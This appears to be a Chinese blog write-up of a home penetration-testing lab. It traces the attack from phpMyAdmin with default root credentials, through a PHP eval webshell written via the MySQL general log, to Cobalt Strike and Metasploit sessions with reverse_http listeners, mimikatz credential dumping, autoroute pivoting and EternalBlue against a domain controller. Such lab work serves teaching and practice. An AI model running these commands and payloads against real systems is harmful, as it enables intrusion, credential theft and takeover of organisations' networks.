kali:192.168.157.137
windows7 :
外网ip: 192.168.157.128
内网ip: 192.168.52.143
win2K3:192.168.52.141
windows2008:192.168.52.138(域控主机)
环境配置
网络配置:
windows7
win2K3
windows2008
kali
开启win7中的PHP study
web渗透
用nmap扫描开放端口
发现开放80端口
访问80端口
利用御剑扫描目录,得到http://192.168.157.128/phpmyadmin/页面
可以使用密码爆破,但我这里看到别人写的密码就直接用了,用户名和密码都是root
登录页面
尝试用日志写入木马getshell
1.查看日志功能是否开启
show global variables like ‘%general%’
2.未开启的话设置为 on
set global general_log=‘ON’
3.开启后将日志文件的存储位置改为可访问到的目录, 根目录即可
set global general_log_file = ‘C:/phpStudy1/WWW/3.php’
4.执行下边一句话木马
数据库将会将查询语句保存在日志文件中
SELECT ‘<?php @eval($_POST["cmd"]); ?>’
5.写入成功后 使用蚁剑连接
我这里已经做过一次了,在win7下已经生成了3.php文件了,你们只要按照这个语句执行就行。
使用蚁剑连接
连接成功
拿下webshell之后进行一些简单的信息收集
内网信息探测
上线CS
点击耳机图标,创建新的监听器
利用CS生成exe可执行程序
上传到windows7上面
执行exe文件
看到靶机上线了
直接提权
运行mimikatz,获取密码
内网域环境信息的收集
使用 ipconfig /all 查看 DNS 服务器,发现主 DNS 后缀不为空,存在域god.org
上面发现 DNS 服务器名为 god.org,当前登录域为 GOD,那接下来可执行net view /domain查看有几个域
感觉回显太慢,直接运行sleep 0,但在实操的时候是不能这样的,会被发现
只有一个域,那就利用 net group “domain controllers” /domain 命令查看域控制器主机名,直接确认域控主机的名称为 OWA
域控主机的名称为 OWA,点击准星那个图标,可得知域控主机的 IP 为 192.168.52.138
局域网扫描出来除了域控主机之外还有另一台主机(名称为ROOT-TVI862UBEH),最后再确认一下该主机是否也是存在域中,故执行命令net group “domain computers” /domain 查看域中的其他主机名,发现包含ROOT-TVI862UBEH,故域中还包含一个域成员主机192.168.52.141
至此内网域信息搜集完毕,已经明确了域控主机为192.168.52.138,同时还存在另一台域成员192.168.52.141,接下来的目标就是横向渗透拿下域控!
内网横向渗透
接下来将通过 Win7 跳板机,横向渗透拿下内网域内的域成员主机和域控主机
利用msf和CS联动
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http(跟cs上选用的payload一样)
set lhost 本机ip
set lport 接受的端口
exploit 执行
然后到CS中创建新的foreign监听器
点击spawn,选择刚刚创建的监听器,就能看到msf生成了新的会话
配置路由
#加载MSF的autoroute模块,获取当前机器的所有网段信息
meterpreter > run post/multi/manage/autoroute
#添加目标内网路由
meterpreter > run post/multi/manage/autoroute SUBNET=192.168.52.0 ACTION=ADD
MSF内网端口扫描
扫出来192.168.52.141和192.168.52.138都开放了445端口,这就可以利用永恒之蓝漏洞
一开始我的445端口没开,我重启win2K3就又打开了
利用永恒之蓝漏洞拿下域控主机
执行命令screenshot截取目标靶机的屏幕,确认已拿下域控
利用msf去远程控制靶机我没实现,因为我的kali机没有联网,操作不了
以上就是全部拿到域控主机的过程。
扫一扫
1433
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
